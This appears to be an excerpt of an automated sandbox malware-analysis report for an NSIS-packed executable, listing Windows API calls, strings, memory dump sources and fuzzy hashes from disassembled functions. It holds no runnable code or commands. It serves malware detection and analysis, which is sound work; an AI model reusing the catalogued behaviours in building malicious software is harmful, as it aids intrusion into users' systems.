                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fTSt7dc60O.exe,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 004059F5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrlen
                                                      • String ID: C:\Users\user\Desktop
                                                      • API String ID: 2709904686-3976562730
                                                      • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                      • Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
                                                      • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                      • Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.1384465097.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000000.00000002.1385695895.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000000.00000002.1385764243.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc
                                                      • String ID:
                                                      • API String ID: 1780285237-0
                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                      • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                      • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                      • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                      • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                      • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                      • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                      • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                      • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                      • DeleteObject.GDI32(00000000), ref: 00404C64
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                      • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                      • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                      • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                      • ShowWindow.USER32(00000000), ref: 0040514F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 1638840714-813528018
                                                      • Opcode ID: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                      • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                      • Opcode Fuzzy Hash: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                      • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                      APIs
                                                      • #17.COMCTL32 ref: 00403379
                                                      • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                      • OleInitialize.OLE32(00000000), ref: 0040338B
                                                        • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                        • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                        • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                      • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                      • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                      • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                      • CharNextW.USER32(00000000,00434000,00000020), ref: 00403403
                                                      • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 0040353B
                                                      • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                      • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                      • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040356C
                                                      • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                      • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                      • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                      • OleUninitialize.OLE32(?), ref: 0040366C
                                                      • ExitProcess.KERNEL32 ref: 0040368C
                                                      • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                      • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                      • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                      • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                      • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                      • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 00403725
                                                      • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                      • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                      • ExitProcess.KERNEL32 ref: 00403827
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                      • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                      • API String ID: 4107622049-1875889550
                                                      • Opcode ID: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                      • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                      • Opcode Fuzzy Hash: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                      • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,00436800,771B2EE0,00434000), ref: 004057F9
                                                      • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,771B2EE0,00434000), ref: 00405841
                                                      • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,771B2EE0,00434000), ref: 00405864
                                                      • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,771B2EE0,00434000), ref: 0040586A
                                                      • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,771B2EE0,00434000), ref: 0040587A
                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                      • FindClose.KERNEL32(00000000), ref: 00405929
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: \*.*
                                                      • API String ID: 2035342205-1173974218
                                                      • Opcode ID: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                      • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                      • Opcode Fuzzy Hash: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                      • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                      • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                      • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                      • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,771B2EE0,004057F0,?,00436800,771B2EE0), ref: 00406296
                                                      • FindClose.KERNEL32(00000000), ref: 004062A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID: 8WB
                                                      • API String ID: 2295610775-3088156181
                                                      • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                      • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                      • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                      • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                      • GetClientRect.USER32(?,?), ref: 004053DC
                                                      • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                      • ShowWindow.USER32(?,00000008), ref: 00405480
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                      • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                        • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                      • CloseHandle.KERNEL32(00000000), ref: 00405508
                                                      • ShowWindow.USER32(00000000), ref: 0040552C
                                                      • ShowWindow.USER32(?,00000008), ref: 00405531
                                                      • ShowWindow.USER32(00000008), ref: 0040557B
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                      • CreatePopupMenu.USER32 ref: 004055C0
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                      • GetWindowRect.USER32(?,?), ref: 004055F4
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                      • OpenClipboard.USER32(00000000), ref: 00405655
                                                      • EmptyClipboard.USER32 ref: 0040565B
                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                      • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                      • CloseClipboard.USER32 ref: 004056B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                      • String ID: {$&B
                                                      • API String ID: 590372296-2518801558
                                                      • Opcode ID: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                      • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                      • Opcode Fuzzy Hash: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                      • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                      • ShowWindow.USER32(?), ref: 00403D1B
                                                      • DestroyWindow.USER32 ref: 00403D2F
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                      • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                      • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                      • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                      • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                      • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                      • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                      • EnableWindow.USER32(?,?), ref: 00403F83
                                                      • EnableWindow.USER32(?,?), ref: 00403F9E
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                      • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                      • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                      • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                      • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                      • String ID: &B
                                                      • API String ID: 184305955-3208460036
                                                      • Opcode ID: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                      • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                      • Opcode Fuzzy Hash: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                      • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                      APIs
                                                        • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                        • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                        • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                      • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,771B3420,00000000,00434000), ref: 004039A0
                                                      • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                      • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                      • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A87
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                      • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                      • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                      • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                      • API String ID: 914957316-1918744475
                                                      • Opcode ID: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                      • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                      • Opcode Fuzzy Hash: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                      • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D
                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                      • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
